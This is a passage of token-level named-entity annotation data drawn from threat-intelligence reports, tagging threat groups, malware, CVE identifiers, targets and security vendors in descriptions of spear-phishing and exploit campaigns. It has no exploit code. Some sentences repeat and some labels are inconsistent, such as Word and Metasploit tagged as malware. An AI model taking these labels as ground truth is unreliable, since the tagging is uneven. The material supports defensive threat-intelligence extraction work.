+Force O
+, O
+or O
+possibly O
+even O
+journalists S-IDTY
+. O
+
+This O
+focus O
+on O
+training O
+aligns O
+with O
+LYCEUM’s S-APT
+targeting O
+of O
+executives S-IDTY
+, O
+HR B-IDTY
+staff E-IDTY
+, O
+and O
+IT B-IDTY
+personnel E-IDTY
+. O
+
+Despite O
+the O
+initial O
+perception O
+that O
+the O
+maldoc S-MAL
+sample O
+was O
+intended O
+for O
+ICS S-IDTY
+or O
+OT B-IDTY
+staff E-IDTY
+, O
+LYCEUM S-APT
+has O
+not O
+demonstrated O
+an O
+interest O
+in O
+those O
+environments O
+. O
+
+The O
+threat O
+actor’s S-APT
+emails S-TOOL
+usually O
+contain O
+a O
+picture O
+or O
+a O
+link O
+without O
+a O
+malicious B-FILE
+payload E-FILE
+and O
+are O
+sent O
+out O
+to O
+a O
+huge O
+recipient O
+database O
+of O
+up O
+to O
+85 O
+, O
+000 O
+users S-IDTY
+. O
+
+Group-IB S-SECTEAM
+specialists O
+determined O
+that O
+the O
+email S-TOOL
+addresses O
+of O
+IT O
+bank S-IDTY
+employees S-IDTY
+were O
+among O
+the O
+recipients O
+of O
+these O
+emails S-TOOL
+. O
+
+While O
+OceanLotus’ S-APT
+targets O
+are O
+global O
+, O
+their O
+operations O
+are O
+mostly O
+active O
+within O
+the O
+APAC S-LOC
+region O
+which O
+encompasses O
+targeting O
+private O
+sectors O
+across O
+multiple O
+industries O
+, O
+foreign B-IDTY
+governments E-IDTY
+, O
+activists S-IDTY
+, O
+and O
+dissidents S-IDTY
+connected O
+to O
+Vietnam S-LOC
+. O
+
+The O
+attackers S-APT
+sent O
+multiple O
+emails S-TOOL
+containing O
+macro-enabled O
+XLS B-FILE
+files E-FILE
+to O
+employees B-IDTY
+working I-IDTY
+in I-IDTY
+the I-IDTY
+banking I-IDTY
+sector E-IDTY
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+Examples O
+as O
+early O
+as O
+2008 S-TIME
+document B-FILE
+malware E-FILE
+operations O
+against O
+Tibetan B-IDTY
+non-governmental I-IDTY
+organizations E-IDTY
+( O
+NGOs S-IDTY
+) O
+that O
+also O
+targeted O
+Falun B-IDTY
+Gong E-IDTY
+and O
+Uyghur B-IDTY
+groups E-IDTY
+. O
+
+The O
+document O
+exploited O
+CVE-2012-0158 S-VULID
+and O
+will O
+decode O
+and O
+write O
+an O
+executable O
+to O
+disk O
+upon O
+infection O
+. O
+
+iSiGHT B-SECTEAM
+Partners E-SECTEAM
+has O
+tracked O
+Sandworm B-APT
+Team E-APT
+for O
+some O
+time O
+- O
+and O
+we O
+publicly O
+reported O
+on O
+some O
+of O
+their O
+activities S-ACT
+in O
+October B-TIME
+2014 E-TIME
+, O
+when O
+we O
+discovered O
+their O
+use O
+of O
+a O
+zero-day S-VULNAME
+exploit S-VULNAME
+, O
+CVE-2014-4114 S-VULID
+. O
+
+In O
+July B-TIME
+of I-TIME
+2015 E-TIME
+, O
+we O
+identified O
+a O
+full O
+e-mail S-TOOL
+uploaded O
+to O
+an O
+antivirus O
+scanning O
+service O
+that O
+carried O
+a O
+Scarlet B-TOOL
+Mimic E-TOOL
+exploit S-VULNAME
+document O
+. O
+
+The O
+group O
+uses O
+legitimate O
+administration O
+tools O
+to O
+fly O
+under O
+the O
+radar O
+in O
+their O
+post-exploitation O
+phase O
+, O
+which O
+makes O
+detection O
+of O
+malicious B-ACT
+activity E-ACT
+, O
+as O
+well O
+as O
+attribution O
+more O
+complicated O
+. O
+
+Through O
+the O
+exploitation O
+of O
+the O
+HTA O
+handler O
+vulnerability O
+described O
+in O
+CVE-2017-1099 S-VULID
+, O
+the O
+observed O
+RTF S-TOOL
+attachments O
+download O
+. O
+
+In O
+early O
+May S-TIME
+, O
+the O
+phishing B-ACT
+lures E-ACT
+leveraged O
+RTF S-TOOL
+attachments O
+that O
+exploited O
+the O
+Microsoft S-IDTY
+Windows S-OS
+vulnerability O
+described O
+in O
+CVE-2017-0199 S-VULID
+. O
+
+As O
+early O
+as O
+March B-TIME
+4 E-TIME
+, O
+2017 S-TIME
+, O
+malicious B-FILE
+documents E-FILE
+exploiting O
+CVE-2017-0199 S-VULID
+were O
+used O
+to O
+deliver O
+the O
+LATENTBOT S-MAL
+malware S-MAL
+. O
+
+FireEye S-SECTEAM
+believes O
+that O
+two O
+actors S-APT
+– O
+Turla S-APT
+and O
+an O
+unknown O
+financially S-IDTY
+motivated O
+actor O
+– O
+were O
+using O
+the O
+first O
+EPS O
+zero-day S-VULNAME
+CVE-2017-0261 S-VULID
+, O
+and O
+APT28 S-APT
+was O
+using O
+the O
+second O
+EPS O
+zero-day S-VULNAME
+CVE-2017-0262 S-VULID
+along O
+with O
+a O
+new O
+Escalation O
+of O
+Privilege O
+(EOP) O
+zero-day S-VULNAME
+CVE-2017-0263 S-VULID
+. O
+
+The O
+first O
+, O
+st07383.en17.docx S-FILE
+, O
+continues O
+by O
+utilizing O
+32 O
+or O
+64 O
+bit O
+versions O
+of O
+CVE-2017-0001 S-VULID
+to O
+escalate O
+privileges O
+before O
+executing O
+a O
+final O
+JavaScript O
+payload O
+containing O
+a O
+malware O
+implant O
+known O
+as O
+SHIRIME S-FILE
+. O
+
+This O
+vulnerability O
+was O
+found O
+in O
+a O
+document O
+named O
+Trump's_Attack_on_Syria_English.docx S-FILE
+. O
+
+It O
+is O
+possible O
+that O
+CVE-2017-8759 S-VULID
+was O
+being O
+used O
+by O
+additional O
+actors S-APT
+. O
+
+The O
+addition O
+of O
+the O
+EternalBlue S-VULNAME
+exploit S-VULNAME
+to O
+Metasploit S-MAL
+has O
+made O
+it O
+easy O
+for O
+threat O
+actors S-APT
+to O
+exploit S-VULNAME
+these O
+vulnerabilities O
+. O
+
+The O
+Magnitude B-MAL
+EK E-MAL
+landing O
+page O
+consisted O
+of O
+CVE-2016-0189 S-VULID
+, O
+which O
+was O
+first O
+reported O
+by O
+FireEye S-SECTEAM
+as O
+being O
+used O
+in O
+Neutrino B-MAL
+Exploit I-MAL
+Kit E-MAL
+after O
+it O
+was O
+patched O
+. O
+
+The O
+malware O
+leverages O
+an O
+exploit S-VULNAME
+, O
+codenamed O
+EternalBlue S-VULNAME
+, O
+that O
+was O
+released O
+by O
+the O
+Shadow B-APT
+Brokers E-APT
+on O
+April B-TIME
+14 E-TIME
+, O
+2017 S-TIME
+. O
+
+Some O
+hackers O
+even O
+went O
+onto O
+use O
+the O
+Cisco S-SECTEAM
+exploits S-VULNAME
+in O
+the O
+wild O
+. O
+
+DanderSpritz S-MAL
+is O
+the O
+framework O
+for O
+controlling O
+infected O
+machines O
+, O
+different O
+from O
+FuZZbuNch S-MAL
+as O
+the O
+latter O
+provides O
+a O
+limited O
+toolkit O
+for O
+the O
+post-exploitation O
+stage O
+with O
+specific O
+functions O
+such O
+as O
+DisableSecurity S-MAL
+and O
+EnableSecurity S-MAL
+for O
+DarkPulsar S-MAL
+. O
+
+In O
+their O
+latest O
+leak O
+, O
+they O
+have O
+released O
+the O
+UNITEDRAKE B-TOOL
+NSA E-TOOL
+exploit S-VULNAME
+, O
+which O
+is O
+a O
+remote O
+access O
+and O
+control O
+tool O
+that O
+can O
+remotely O
+target O
+Windows-based S-OS
+systems O
+to O
+capture O
+desired O
+information O
+and O
+transfer O
+it O
+to O
+a O
+server O
+. O
+
+On O
+the O
+other O
+hand O
+, O
+ShadowBrokers O
+group O
+made O
+headlines O
+in O
+2016 S-TIME
+when O
+it O
+claimed O
+to O
+have O
+robbed O
+various O
+exploitation O
+tools O
+used O
+by O
+the O
+NSA S-IDTY
+including O
+the O
+notorious O
+EternalBlue S-VULNAME
+that O
+was O
+a O
+vital O
+component O
+in O
+the O
+WannaCry B-ACT
+ransomware I-ACT
+campaign E-ACT
+causing O
+damages O
+to O
+systems O
+worldwide O
+. O
+
+In O
+all O
+emails S-TOOL
+sent O
+to O
+these O
+government B-IDTY
+officials E-IDTY
+, O
+the O
+actor O
+used O
+the O
+same O
+attachment O
+: O
+a O
+malicious B-FILE
+Microsoft I-FILE
+Word I-FILE
+document E-FILE
+that O
+exploited O
+the O
+CVE-2012-0158 S-VULID
+vulnerability O
+to O
+drop O
+a O
+malicious O
+payload O
+. O
+
+Despite O
+being O
+an O
+older O
+vulnerability O
+, O
+many O
+threat O
+actors O
+continue O
+to O
+leverage O
+CVE-2012-0158 S-VULID
+to O
+exploit S-VULNAME
+Microsoft B-FILE
+Word E-FILE
+. O
+
+According O
+to O
+the O
+security B-IDTY
+firm E-IDTY
+, O
+this O
+campaign O
+targeted O
+Indian O
+military B-IDTY
+officials E-IDTY
+via O
+spear-phishing S-ACT
+emails S-TOOL
+, O
+distributing O
+spyware O
+to O
+its O
+victims O
+via O
+an O
+Adobe B-TOOL
+Reader E-TOOL
+vulnerability S-VULNAME
+. O
+
+In O
+order O
+to O
+carry O
+out O
+this O
+operation O
+, O
+it O
+uses O
+publicly B-MAL
+available I-MAL
+tools E-MAL
+, O
+including O
+Mimikatz S-MAL
+( O
+Hacktool.Mimikatz S-MAL
+) O
+and O
+an O
+open-source O
+tool O
+that O
+exploits O
+a O
+known O
+Windows S-OS
+privilege O
+escalation O
+vulnerability O
+( O
+CVE-2016-0051 S-VULID
+) O
+on O
+unpatched O
+computers O
+. O
+
+Each O
+of O
+the O
+spear B-ACT
+phishing I-ACT
+attacks E-ACT
+contained O
+links O
+to O
+.doc B-MAL
+files E-MAL
+, O
+which O
+were O
+really O
+RTF B-FILE
+documents E-FILE
+that O
+attempt O
+to O
+exploit S-VULNAME
+CVE-2017-8570 S-VULID
+( O
+Composite B-TOOL
+Moniker E-TOOL
+) O
+. O
+
+The O
+Word S-TOOL
+document O
+usually O
+exploits O
+CVE-2012-0158 S-VULID
+. O
+
+Sometimes O
+the O
+attackers S-APT
+send O
+an O
+MS B-FILE
+PowerPoint I-FILE
+document E-FILE
+instead O
+, O
+which O
+exploits O
+CVE-2014-6352 S-VULID
+. O
+
+Sometimes O
+Patchwork S-APT
+send O
+an O
+MS B-FILE
+PowerPoint I-FILE
+document E-FILE
+instead O
+, O
+which O
+exploits O
+CVE-2014-6352 S-VULID
+. O
+
+The O
+malicious O
+documents O
+that O
+Unit B-SECTEAM
+42 E-SECTEAM
+examined O
+contained O
+legitimate O
+decoy O
+lures O
+as O
+well O
+as O
+malicious O
+embedded O
+EPS B-FILE
+files E-FILE
+targeting O
+the O
+CVE-2015-2545 S-VULID
+and O
+CVE-2017-0261 S-VULID
+vulnerabilities O
+. O
+
+One O
+of O
+the O
+favorite O
+methods O
+used O
+by O
+the O
+Pitty B-APT
+Tiger I-APT
+group E-APT
+to O
+infect O
+users O
+is O
+to O
+use O
+a O
+Microsoft B-FILE
+Office I-FILE
+Word I-FILE
+document E-FILE
+which O
+exploits O
+a O
+specific O
+vulnerability O
+( O
+CVE-2012-0158 S-VULID
+) O
+. O
+
+The O
+document O
+, O
+when O
+opened O
+, O
+used O
+an O
+embedded O
+ActiveX B-MAL
+control E-MAL
+to O
+download O
+a O
+JavaScript B-FILE
+file E-FILE
+from O
+a O
+remote O
+site O
+that O
+used O
+a O
+previously O
+unknown O
+vulnerability O
+in O
+some O
+versions O
+of O
+Windows S-OS
+( O
+later O
+designated O
+CVE-2013-7331 S-VULID
+) O
+to O
+read O
+information O
+about O
+the O
+browser O
+'s O
+installed O
+components O
+. O
+
+The O
+document B-FILE
+files E-FILE
+exploit S-VULNAME
+at O
+least O
+three O
+known O
+vulnerabilities S-VULNAME
+in O
+Microsoft S-IDTY
+Office O
+, O
+which O
+we O
+discuss O
+in O
+the O
+Infection O
+Techniques O
+section O
+. O
+
+In O
+all O
+emails S-TOOL
+sent O
+to O
+these O
+government B-IDTY
+officials E-IDTY
+, O
+the O
+actor O
+used O
+the O
+same O
+attachment O
+: O
+a O
+malicious B-FILE
+Microsoft I-FILE
+Word I-FILE
+document E-FILE
+that O
+exploited O
+the O
+CVE-2012-0158 S-VULID
+vulnerability O
+to O
+drop O
+a O
+malicious O
+payload O
+. O
+
+According O
+to O
+the O
+security B-IDTY
+firm E-IDTY
+, O
+this O
+campaign O
+targeted O
+Indian O
+military B-IDTY
+officials E-IDTY
+via O
+spear-phishing S-ACT
+emails S-TOOL
+, O
+distributing O
+spyware O
+to O
+its O
+victims O
+via O
+an O
+Adobe B-TOOL
+Reader E-TOOL
+vulnerability S-VULNAME
+. O
+
+PLATINUM S-APT
+'s O
+persistent O
+use O
+of O
+spear B-ACT
+phishing I-ACT
+tactics E-ACT
+( O
+phishing S-ACT
+attempts O
+aimed O
+at O
+specific B-IDTY
+individuals E-IDTY
+) O
+and O
+access O
+to O
+previously O
+undiscovered O
+zero-day S-VULNAME
+exploits O
+have O
+made O
+it O
+a O
+highly O
+resilient O
+threat O
+. O
+
+The O
+group O
+'s O
+persistent O
+use O
+of O
+spear B-ACT
+phishing I-ACT
+tactics E-ACT
+( O
+phishing S-ACT
+attempts O
+aimed O
+at O
+specific B-IDTY
+individuals E-IDTY
+) O
+and O
+access O
+to O
+previously O
+undiscovered O
+zero-day S-VULNAME
+exploits O
+have O
+made O
+it O
+a O
+highly O
+resilient O
+threat O
+. O
+
+We O
+believe O
+that O
+the O
+Carbanak S-MAL
+campaign O
+is O
+a O
+clear O
+indicator O
+of O
+a O
+new O
+era O
+in O
+cybercrime O
+in O
+which O
+criminals S-APT
+use O
+APT B-ACT
+techniques E-ACT
+directly O
+against O
+the O
+financial B-IDTY
+industry E-IDTY
+instead O
+of O
+through O
+its O
+customers S-IDTY
+. O
+
+Carbanak S-MAL
+has O
+its O
+origin O
+in O
+more O
+common O
+financial O
+fraud O
+including O
+theft O
+from O
+consumer S-IDTY
+and O
+corporate O
+bank O
+accounts O
+in O
+Europe S-LOC
+and O
+Russia S-LOC
+, O
+using O
+standard O
+banking O
+malware O
+, O
+mainly O
+Carberp S-MAL
+. O
+
+However O
+, O
+in O
+September S-TIME
+last O
+year O
+, O
+our O
+friends O
+at O
+CSIS S-SECTEAM
+published O
+a O
+blog O
+detailing O
+a O
+new O
+Carbanak S-MAL
+variant O
+affecting O
+one O
+of O
+its O
+customers S-IDTY
+. O
+
+PIVY S-MAL
+also O
+played O
+a O
+key O
+role O
+in O
+the O
+2011 B-ACT
+campaign E-ACT
+known O
+as O
+Nitro O
+that O
+targeted O
+chemical B-IDTY
+makers E-IDTY
+, O
+government B-IDTY
+agencies E-IDTY
+, O
+defense B-IDTY
+contractors E-IDTY
+, O
+and O
+human O
+rights O
+groups.10,11 O
+Still O
+active O
+a O
+year O
+later O
+, O
+the O
+Nitro O
+attackers S-APT
+used O
+a O
+zero-day S-VULNAME
+vulnerability O
+in O
+Java O
+to O
+deploy O
+PIVY S-MAL
+in O
+2012 S-TIME
+. O
+
+Each O
+of O
+the O
+spear B-ACT
+phishing I-ACT
+attacks E-ACT
+contained O
+links O
+to O
+.doc B-MAL
+files E-MAL
+, O
+which O
+were O
+really O
+RTF B-FILE
+documents E-FILE
+that O
+attempt O
+to O
+exploit S-VULNAME
+CVE-2017-8570 S-VULID
+( O
+Composite B-TOOL
+Moniker E-TOOL
+) O
+. O
+
+The O
+Word S-TOOL
+document O
+usually O
+exploits O
+CVE-2012-0158 S-VULID
+. O
+
+Sometimes O
+the O
+attackers S-APT
+send O
+an O
+MS B-FILE
+PowerPoint I-FILE
+document E-FILE
+instead O
+, O
+which O
+exploits O
+CVE-2014-6352 S-VULID
+. O
+
+Sometimes O
+Patchwork S-APT
+send O
+an O
+MS B-FILE
+PowerPoint I-FILE
+document E-FILE
+instead O
+, O
+which O
+exploits O
+CVE-2014-6352 S-VULID
+. O
+
+The O
+malicious O
+documents O
+that O
+Unit B-SECTEAM
+42 E-SECTEAM
+examined O
+contained O
+legitimate O
+decoy O
+lures O
+as O
+well O
+as O
+malicious O
+embedded O
+EPS B-FILE
+files E-FILE
+targeting O
+the O
+CVE-2015-2545 S-VULID
+and O
+CVE-2017-0261 S-VULID
+vulnerabilities O
+. O
+
+Older O
+documents O
+used O
+by O
+Patchwork S-APT
+focused O
+on O
+the O
+CVE-2017-0261 S-VULID
+vulnerability O
+, O
+however O
+in O
+late B-TIME
+January I-TIME
+2018 E-TIME
+when O
+, O
+paradoxically O
+, O
+newer O
+documents O
+abandoned O
+this O
+vulnerability O
+to O
+attack O
+the O
+older O
+CVE-2015-2545 S-VULID
+vulnerability O
+. O
+
+PittyTiger S-APT
+has O
+also O
+been O
+seen O
+using O
+Heartbleed B-VULNAME
+vulnerability E-VULNAME
+in O
+order O
+to O
+directly O
+get O
+valid O
+credentials O
+. O
+
+They O
+have O
+also O
+been O
+seen O
+using O
+Heartbleed B-VULNAME
+vulnerability E-VULNAME
+in O
+order O
+to O
+directly O
+get O
+valid O
+credentials O
+. O
+
+One O
+of O
+the O
+favorite O
+methods O
+used O
+by O
+the O
+Pitty B-APT
+Tiger I-APT
+group E-APT
+to O
+infect O
+users O
+is O
+to O
+use O
+a O
+Microsoft B-FILE
+Office I-FILE
+Word I-FILE
+document E-FILE
+which O
+exploits O
+a O
+specific O
+vulnerability O
+( O
+CVE-2012-0158 S-VULID
+) O
+. O
+
+PittyTiger S-APT
+could O
+also O
+use O
+CVE-2014-1761 S-VULID
+, O
+which O
+is O
+more O
+recent O
+. O
+
+PLATINUM S-APT
+is O
+known O
+to O
+have O
+used O
+a O
+number O
+of O
+zero-day S-VULNAME
+exploits O
+, O
+for O
+which O
+no O
+security O
+update O
+is O
+available O
+at O
+the O
+time O
+of O
+transmission O
+, O
+in O
+these O
+attempts O
+. O
+
+The O
+document O
+, O
+when O
+opened O
+, O
+used O
+an O
+embedded O
+ActiveX B-MAL
+control E-MAL
+to O
+download O
+a O
+JavaScript B-FILE
+file E-FILE
+from O
+a O
+remote O
+site O
+that O
+used O
+a O
+previously O
+unknown O
+vulnerability O
+in O
+some O
+versions O
+of O
+Windows S-OS
+( O
+later O
+designated O
+CVE-2013-7331 S-VULID
+) O
+to O
+read O
+information O
+about O
+the O
+browser O
+'s O
+installed O
+components O
+. O
+
+When O
+the O
+document O
+was O
+opened O
+in O
+Word S-MAL
+, O
+PLATINUM S-APT
+exploited O
+a O
+previously O
+unknown O
+vulnerability O
+in O
+the O
+Microsoft S-IDTY
+Office O
+PostScript O
+interpreter O
+( O
+designated O
+CVE-2015-2545 S-VULID
+) O
+that O
+enabled O
+it O
+to O
+execute O
+the O
+attacker S-APT
+'s O
+code O
+and O
+drop O
+an O
+attacker-generated O
+malicious B-ACT
+DLL E-ACT
+onto O
+the O
+computer O
+. O
+
+The O
+DLL S-MAL
+exploited O
+another O
+previously O
+unknown O
+vulnerability O
+( O
+designated O
+CVE-2015-2546 S-VULID
+) O
+in O
+the O
+Windows S-OS
+kernel O
+, O
+which O
+enabled O
+it O
+to O
+elevate O
+privileges O
+for O
+the O
+Word S-MAL
+executable O
+and O
+subsequently O
+install O
+a O
+backdoor O
+through O
+the O
+application O
+. O
+
+When O
+the O
+document O
+was O
+opened O
+in O
+Word S-MAL
+, O
+it O
+exploited O
+a O
+previously O
+unknown O
+vulnerability O
+in O
+the O
+Microsoft S-IDTY
+Office O
+PostScript O
+interpreter O
+( O
+designated O
+CVE-2015-2545 S-VULID
+) O
+that O
+enabled O
+it O
+to O
+execute O
+the O
+attacker S-APT
+'s O
+code O
+and O
+drop O
+an O
+attacker-generated O
+malicious B-ACT
+DLL E-ACT
+onto O
+the O
+computer O
+. O
+
+In O
+total O
+, O
+PLATINUM S-APT
+made O
+use O
+of O
+four O
+zero-day S-VULNAME
+exploits O
+during O
+these O
+two O
+attack B-ACT
+campaigns E-ACT
+( O
+two O
+remote B-ACT
+code I-ACT
+execution E-ACT
+bugs O
+, O
+one O
+privilege O
+escalation O
+, O
+and O
+one O
+information O
+disclosure O
+) O
+, O
+showing O
+an O
+ability O
+to O
+spend O
+a O
+non-trivial O
+amount O
+of O
+resources O
+to O
+either O
+acquire O
+professionally O
+written O
+zero-day S-VULNAME
+exploits O
+from O
+unknown O
+markets O
+, O
+or O
+research O
+and O
+utilize O
+the O
+zero-day S-VULNAME
+exploits O
+themselves O
+. O
+
+PLATINUM S-APT
+has O
+used O
+several O
+zero-day S-VULNAME
+exploits O
+against O
+their O
+victims O
+. O
+
+Even O
+if O
+CVE-2015-2546 S-VULID
+affected O
+Windows S-OS
+10 O
+, O
+the O
+exploitation O
+would O
+have O
+required O
+much O
+more O
+technical O
+prowess O
+to O
+succeed O
+; O
+ultimately O
+, O
+SMEP O
+makes O
+it O
+more O
+difficult O
+for O
+attackers S-APT
+. O
+
+For O
+example O
+, O
+one O
+zero-day S-VULNAME
+vulnerability O
+exploit S-VULNAME
+( O
+CVE-2015-2545 S-VULID
+) O
+used O
+by O
+PLATINUM S-APT
+was O
+addressed O
+immediately O
+in O
+September B-TIME
+2015 E-TIME
+. O
+
+It O
+possesses O
+a O
+wide O
+range O
+of O
+technical B-MAL
+exploitation I-MAL
+capabilities E-MAL
+, O
+significant O
+resources O
+for O
+researching O
+or O
+purchasing O
+complicated O
+zero-day S-VULNAME
+exploits O
+, O
+the O
+ability O
+to O
+sustain O
+persistence O
+across O
+victim O
+networks O
+for O
+years O
+, O
+and O
+the O
+manpower O
+to O
+develop O
+and O
+maintain O
+a O
+large O
+number O
+of O
+tools O
+to O
+use O
+within O
+unique O
+victim O
+networks O
+. O
+
+In O
+2016 S-TIME
+, O
+an O
+attack B-ACT
+campaign E-ACT
+by O
+this O
+group O
+was O
+recorded O
+in O
+early B-TIME
+May E-TIME
+that O
+made O
+use O
+of O
+an O
+exploit S-VULNAME
+for O
+CVE-2016-4117 S-VULID
+, O
+a O
+vulnerability O
+in O
+Adobe O
+Flash S-TOOL
+Player O
+, O
+which O
+at O
+the O
+time O
+was O
+both O
+unknown O
+and O
+unpatched O
+. O
+
+To O
+deliver O
+the O
+malware O
+to O
+the O
+victim O
+machines O
+, O
+the O
+Rocke S-APT
+group O
+exploits O
+vulnerabilities S-VULNAME
+in O
+Apache O
+Struts O
+2 O
+, O
+Oracle B-TOOL
+WebLogic E-TOOL
+, O
+and O
+Adobe B-TOOL
+ColdFusion E-TOOL
+. O
+
+However O
+, O
+around O
+a O
+month O
+ago O
+, O
+Rocke S-APT
+started O
+targeting O
+systems O
+that O
+run O
+Jenkins O
+by O
+attempting O
+to O
+exploit S-VULNAME
+CVE-2018-1000861 S-VULID
+and O
+CVE-2019-1003000 S-VULID
+. O
+
+The O
+Shadow O
+Brokers O
+first O
+emerged O
+in O
+August S-TIME
+, O
+when O
+they O
+posted O
+links O
+to O
+a O
+selection O
+of O
+NSA S-TOOL
+exploits S-VULNAME
+and O
+hacking O
+tools O
+onto O
+Github O
+and O
+other O
+websites O
+. O
+
+In O
+April S-TIME
+, O
+2018 S-TIME
+, O
+the O
+360 B-SECTEAM
+Core I-SECTEAM
+Security E-SECTEAM
+takes O
+the O
+lead O
+in O
+capturing O
+the O
+APT-C-06 S-APT
+group’s O
+new O
+APT O
+attack O
+using O
+0-day S-VULNAME
+vulnerabilities O
+CVE-2018-8174 S-VULID
+in O
+the O
+wild O
+. O
+
+The O
+group O
+has O
+demonstrated O
+access O
+to O
+zero-day S-VULNAME
+vulnerabilities O
+CVE-2018-0802 S-VULID
+, O
+and O
+the O
+ability O
+to O
+incorporate O
+them O
+into O
+operations O
+. O
+
+FireEye S-SECTEAM
+observed O
+a O
+high O
+volume O
+of O
+activity O
+associated O
+with O
+the O
+exploitation O
+of O
+CVE-2017-10271 S-VULID
+following O
+the O
+public O
+posting O
+of O
+proof O
+of O
+concept O
+code O
+in O
+December B-TIME
+2017 E-TIME
+. O
+
+If O
+the O
+lateral O
+movement O
+with O
+credentials O
+fails O
+, O
+then O
+the O
+malware O
+uses O
+PingCastle B-MAL
+MS17-010 E-MAL
+scanner O
+(PingCastle O
+is O
+a O
+French S-LOC
+Active O
+Directory O
+security O
+tool) O
+to O
+scan O
+that O
+particular O
+host O
+to O
+determine O
+if O
+its O
+vulnerable O
+to O
+EternalBlue S-VULNAME
+, O
+and O
+uses O
+it O
+to O
+spread O
+to O
+that O
+host O
+. O
+
+Tactic O
+#1: O
+Delivering O
+the O
+miner O
+directly O
+to O
+a O
+vulnerable O
+serverSome O
+tactics O
+we've O
+observed O
+involve O
+exploiting O
+CVE-2017-10271 S-VULID
+, O
+leveraging O
+PowerShell S-MAL
+to O
+download O
+the O
+miner O
+directly O
+onto O
+the O
+victim’s O
+system O
+(Figure O
+1) O
+, O
+and O
+executing S-ACT
+it O
+using B-ACT
+ShellExecute() E-ACT
+. O
+
+We O
+assess O
+that O
+the O
+actors O
+employing O
+this O
+latest O
+Flash S-TOOL
+zero-day S-VULNAME
+are O
+a O
+suspected O
+North B-LOC
+Korean E-LOC
+group O
+we O
+track O
+as O
+TEMP.Reaper S-APT
+. O
+
+Figure O
+2: O
+Zyklon S-APT
+attack O
+flowInfection O
+Techniques O
+CVE-2017-8759 S-VULID
+. O
+
+This O
+vulnerability S-VULNAME
+was O
+discovered O
+by O
+FireEye S-SECTEAM
+in O
+September B-TIME
+2017 E-TIME
+, O
+and O
+it O
+is O
+a O
+vulnerability O
+we O
+have O
+observed O
+being O
+exploited O
+in O
+the O
+wild O
+. O
+
+Figure O
+3: O
+Embedded O
+URL O
+in O
+OLE O
+object O
+CVE-2017-11882 S-VULID
+Similarly O
+, O
+we O
+have O
+also O
+observed O
+actors S-APT
+leveraging O
+another O
+recently O
+discovered O
+vulnerability O
+CVE-2017-11882 S-VULID
+in O
+Microsoft S-IDTY
+Office O
+. O
+
+The O
+other O
+overlapping O
+files O
+are O
+tools O
+used O
+by O
+the O
+adversary O
+to O
+locate O
+other O
+systems O
+on O
+the O
+network O
+( O
+etool.exe S-FILE
+) O
+, O
+check O
+to O
+see O
+if O
+they O
+are O
+vulnerable O
+to O
+CVE-2017-0144 S-VULID
+( O
+EternalBlue S-VULNAME
+) O
+patched O
+in O
+MS07-010 S-FILE
+( O
+checker1.exe S-FILE
+) O
+and O
+pivot O
+to O
+them O
+using O
+remote O
+execution O
+functionality O
+offered O
+by O
+a O
+tool O
+similar O
+to O
+PsExec S-TOOL
+offered O
+by O
+Impacket S-TOOL
+( O
+psexec.exe S-FILE
+) O
+. O
+
+The O
+files O
+uploaded O
+to O
+this O
+webshell O
+included O
+the O
+same O
+compiled O
+python B-MAL
+script E-MAL
+that O
+would O
+scan O
+remote O
+systems O
+that O
+were O
+vulnerable O
+to O
+CVE-2017-0144 S-VULID
+( O
+EternalBlue S-VULNAME
+) O
+that O
+we O
+saw O
+uploaded O
+to O
+the O
+other O
+errr.aspx S-FILE
+webshell O
+. O
+
+We O
+believe O
+the O
+actors S-APT
+pivoted O
+to O
+other O
+systems O
+on O
+the O
+network O
+using O
+stolen B-ACT
+credentials E-ACT
+and O
+by O
+exploiting O
+the O
+CVE-2017-0144 S-VULID
+( O
+EternalBlue S-VULNAME
+) O
+vulnerability O
+patched O
+in O
+MS17-010 S-FILE
+. O
+
+Code O
+contained O
+inside O
+one O
+of O
+the O
+slides S-FILE
+triggers O
+an O
+exploit S-VULNAME
+for O
+CVE-2017-8759 S-VULID
+, O
+a O
+remote O
+code O
+execution O
+vulnerability O
+in O
+Microsoft B-TOOL
+.NET I-TOOL
+framework E-TOOL
+. O
+
+According O
+to O
+FireEye S-SECTEAM
+, O
+the O
+admin@338 S-APT
+sent O
+out O
+emails S-TOOL
+containing O
+malicious O
+documents O
+designed O
+to O
+exploit S-VULNAME
+Microsoft B-IDTY
+Office E-IDTY
+vulnerabilities S-VULNAME
+in O
+an O
+effort O
+to O
+deliver O
+a O
+piece O
+of O
+malware O
+dubbed O
+LOWBALL S-MAL
+. O
+
+According O
+to O
+FireEye S-SECTEAM
+, O
+the O
+attackers S-APT
+sent O
+out O
+emails S-TOOL
+containing O
+malicious O
+documents O
+designed O
+to O
+exploit S-VULNAME
+Microsoft B-IDTY
+Office E-IDTY
+vulnerabilities S-VULNAME
+in O
+an O
+effort O
+to O
+deliver O
+a O
+piece O
+of O
+malware O
+dubbed O
+LOWBALL S-MAL
+. O
+
+Similar O
+to O
+RIPTIDE B-ACT
+campaigns E-ACT
+, O
+APT12 S-APT
+infects O
+target O
+systems O
+with O
+HIGHTIDE S-MAL
+using O
+a O
+Microsoft B-TOOL
+Word E-TOOL
+( O
+.doc S-FILE
+) O
+document O
+that O
+exploits O
+CVE-2012-0158 S-VULID
+. O
+
+The O
+Sofacy B-APT
+group E-APT
+spearphished O
+targets O
+in O
+several O
+waves O
+with O
+Flash S-TOOL
+exploits S-VULNAME
+leading O
+to O
+their O
+Carberp S-MAL
+based O
+JHUHUGIT B-MAL
+downloaders E-MAL
+and O
+further O
+stages O
+of O
+malware O
+. O
+
+APT28 S-APT
+spearphished O
+targets O
+in O
+several O
+waves O
+with O
+Flash S-TOOL
+exploits S-VULNAME
+leading O
+to O
+their O
+Carberp S-MAL
+based O
+JHUHUGIT B-MAL
+downloaders E-MAL
+and O
+further O
+stages O
+of O
+malware O
+. O
+
+The O
+group O
+spearphished O
+targets O
+in O
+several O
+waves O
+with O
+Flash S-TOOL
+exploits S-VULNAME
+leading O
+to O
+their O
+Carberp S-MAL
+based O
+JHUHUGIT B-MAL
+downloaders E-MAL
+and O
+further O
+stages O
+of O
+malware O
+. O
+
+APT28 S-APT
+is O
+using O
+novel O
+techniques O
+involving O
+the O
+EternalBlue S-VULNAME
+exploits S-VULNAME
+and O
+the O
+open B-MAL
+source I-MAL
+tool E-MAL
+Responder S-MAL
+to O
+spread O
+laterally O
+through O
+networks O
+and O
+likely O
+target O
+travelers O
+. O
+
+The O
+JHUHUGIT S-MAL
+implant O
+became O
+a O
+relatively O
+popular O
+first O
+stage O
+for O
+the O
+Sofacy B-ACT
+attacks E-ACT
+and O
+was O
+used O
